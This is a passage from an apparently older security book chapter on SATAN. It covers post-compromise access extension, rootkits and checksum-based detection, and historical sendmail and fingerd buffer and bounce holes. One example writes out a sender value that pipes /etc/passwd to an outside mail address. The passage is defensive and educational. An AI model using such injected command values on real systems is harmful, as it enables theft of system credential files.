Phase Three: Extend Access

After the intruder has root access, the system can be used to attack other systems on the network. Common attack approaches include modifications to login daemons to capture passwords (ftpd, telnetd, rlogind, login), addition of packet sniffers that capture the passwords of network traffic and send them back to the intruder, and masquerade attacks that attempt to use trust to gain access.

As mentioned before, SATAN specifically focuses on the first phase of an attack, and offers some help in the second phase. SATAN does not typically play a role in this third phase. Using the burglar analogy, SATAN helps to locate a car in the parking lot that has an unlocked door and indicates which door is unlocked (first phase). Then the burglar either looks for car keys left above the visor, or hotwires the car (second phase). Finally, this third phase involves driving the car around the parking lot to find other cars that are unlocked. As SATAN may have gathered information about other important hosts (NFS servers or NIS servers), this third phase may use that information to focus attacks on gathering access to those systems.

In general, once an intruder has control of your system, there is little you can do. A competent intruder can easily cover his tracks by modifying accounting and auditing records. Some enterprising hackers have even built automated programs that completely hide all traces of their presence; one popular version of this is called rootkit. This package comes with source for programs such as ps, ls, sum, and who; the system administrator is no longer able to determine the integrity of binaries because the sum command gives tainted information. Similarly, the ps command does not show the admin programs run by the intruder. Fortunately, rootkit is quite difficult to find—the primary distribution method has not been through FTP archives.

If you suspect that an intruder has gained root access to your system, you should get a fresh copy of admin binaries such as sum or md5 and check the checksums of binaries against the original versions on the distribution CD. The COPS program can help do this. Another similar program, Tripwire, offers similar functionality to COPS.

An Overview of Holes

At this point, the general approach of a network attack should be clear. To explore the first phase of an attack, you should now investigate details on security holes that have been closed in popular Internet services. The following holes have been patched by most vendors and announced by CERT or the vendors; however, similar holes are frequently re-opened in new releases, and many system administrators are slow to apply patches. This should clarify the fact that system administrators should install vendor patches as soon as they are released.

Unlike misconfiguration errors, which are described in detail later in the chapter, these security holes have arisen due mostly to software programming mistakes in the network daemons. Although the core set of scans included in SATAN does not include each of these holes, adding scans for the following holes to SATAN would be quite straightforward. An example of adding a scan to SATAN is included at the end of this chapter.

---

Note:  A useful paper by Landwehr (Landwehr et al., 1993) gives a breakdown of the source of 50 security flaws. Of these 50 security holes, 9 were introduced because of user configuration errors, 3 were introduced by the vendor during code maintenance (patches), and the remaining 38 were introduced by the software designers during the design and creation of the program.

---

sendmail -d Debug Hole

A sendmail hole involves the -d command-line option, which permits a user to specify a debug level. All users must be able to invoke sendmail in order to send mail. By specifying a very large value to the debug option of sendmail, a user could overwrite the stack frame and cause unexpected commands to be executed. This was fixed by adding a range check to the passed values. SATAN scans for versions of sendmail that are old enough to include this security hole.

sendmail Bounce to Program Hole

By specifying a user such as |/bin/mail amyp@diana.com < /etc/passwd as the sender of a message, and then indicating a bad recipient name, sendmail would accept the message, attempt to send to the bad recipient, realize that user did not exist, and bounce an error message back to the sender. The sender would in reality be a program that executed, causing a malicious action such as mailing the passwd file. Sendmail was not smart enough to prevent senders from being programs. Once again, SATAN scans for versions of sendmail that are old enough to include this security hole.

sendmail syslog Buffer Problem

sendmail, along with many other programs, uses syslog() calls to send information to the syslogd daemon. The buffer dedicated to reading syslog() writes in the syslogd daemon does not look for overflows. The syslog() call would invoke the vsprintf() libc call and overflow the stack frame for the vsprintf() call. The vsprintf() call was modified to prevent an overflow of the stack frame. A hacker script was made available to gain root access on Sun OS systems by writing long information into the appropriate fields of an SMTP transfer, causing the remote sendmail to invoke a root shell.

fingerd Buffer Problem

One of the vulnerabilities exploited by the famous Internet worm, fingerd would read a line of information using the gets() call. The buffer allocated for the string was 512 bytes long, but the fingerd program did not check to see that the read was greater than 512 bytes before exiting the subroutine. If the line of information was greater than 512 bytes, the data was written over the subroutine’s stack frame return address location. The stack could be rewritten to permit the intruder to create a new shell and execute commands.

The Internet worm wrote 536 bytes of information to the gets() call, with the overflowing 24 bytes consisting of VAX assembly language code that, upon return from the main() call, tried to execute a shell by calling execve(“/bin/sh”,0,0).